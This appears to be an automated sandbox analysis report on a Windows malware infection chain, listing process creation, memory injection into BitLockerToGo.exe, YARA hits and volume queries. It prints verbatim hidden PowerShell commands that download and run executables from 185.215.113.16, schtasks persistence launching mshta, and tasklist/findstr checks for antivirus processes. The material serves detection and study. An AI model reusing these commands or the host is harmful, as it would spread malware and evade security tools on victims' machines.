Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00F30C21

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_7396.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7664.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_516.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5100.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_6752.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 3900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 5440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6752, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory written: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 31BE008
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 455000

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F71201

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F52BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_00F52BA5

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F7B226 SendInput,keybd_event,

8_2_00F7B226

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

8_2_00F922DA

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: unknown unknown
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F70B62

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_00F71663

Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: rcFProgram Manager
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Program Manager
Source: afccf6841f.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_008FD3E2 cpuid

6_2_008FD3E2

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075518001\r7MRNUY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075518001\r7MRNUY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
